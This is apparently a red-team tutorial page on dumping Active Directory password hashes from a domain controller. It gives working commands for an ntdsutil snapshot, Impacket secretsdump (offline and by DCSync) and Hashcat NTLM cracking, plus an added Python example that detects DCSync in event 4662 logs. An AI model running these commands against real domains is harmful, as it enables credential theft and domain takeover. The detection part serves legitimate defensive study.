Domain Controller

NTDS Domain Controller

NTDS (the Active Directory database) stores domain-related information, including account password hashes, in Windows domain environments. The NTDS database and the two registry hives needed to decrypt it are stored in the following locations:

  • NTDS database: C:\Windows\NTDS\ntds.dit
  • SYSTEM registry hive: C:\Windows\System32\config\SYSTEM
  • SECURITY registry hive: C:\Windows\System32\config\SECURITY

Local Dumping (No Credentials)

The live ntds.dit file is locked by the directory service, so to obtain a copy locally, use ntdsutil to create an IFM (Install From Media) snapshot, which writes ntds.dit together with the SYSTEM and SECURITY hives under c:\temp:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can then export ntds.dit, SYSTEM and SECURITY using scp.

Then, use secretsdump.py from the Impacket suite to extract the hashes from these files offline:

python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local

Remote Dumping (With Credentials)

DC Sync Attack

DC Sync is possible when an account has one of the following permissions:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes in Filtered Set

To dump hashes remotely with DC Sync, use Impacket:

python3.9 /opt/impacket/examples/secretsdump.py -just-dc <DOMAIN>/<AD_Admin_User>@<IP>  # For NTDS
python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm <DOMAIN>/<AD_Admin_User>@<IP>  # For NTLM hashes
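From the defensive side, a DC Sync request shows up on the domain controller as Security event 4662 whose Properties field carries the control-access GUIDs for the three replication rights listed above. The following is an added example, not part of the original page, that filters such events in Python and flags replication requests from any account other than the expected domain controller computer accounts; the sample records and the allowlist are constructed assumptions.

```python
# Added example: flag DCSync-style replication requests in Security event 4662 records.
# The GUIDs are the well-known control access rights; all sample data below is constructed.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def replication_rights(event):
    """Return the names of replication rights present in a 4662 event's Properties field."""
    if event.get("EventID") != 4662:
        return []
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def find_dcsync(events, expected_replicators):
    """Return (account, rights) pairs for replication requests not made by an allowlisted DC account."""
    allow = {acct.upper() for acct in expected_replicators}
    findings = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        # Domain controllers replicate among themselves; only their computer accounts are expected here.
        if user.upper() in allow:
            continue
        findings.append((user, rights))
    return findings


SAMPLE_EVENTS = [  # constructed records in the shape of parsed 4662/4624 events
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary object access by the same user: constructed, non-replication GUID, must not be flagged.
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "Properties": ""},
]

if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"]):
        print(f"possible DCSync by {user}: {', '.join(rights)}")
```

Only the replication request made by jdoe is reported; the one from DC01$ is normal inter-DC replication.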

Cracking NTLM Hashes

Once NTLM hashes are obtained, they can be used for impersonation or cracked to recover the password. To crack the hashes, use Hashcat's NTLM mode (-m 1000) in straight wordlist mode (-a 0):

hashcat -m 1000 -a 0 /path/to/ntlm_hashes.txt /path/to/wordlist/such/as/rockyou.txt
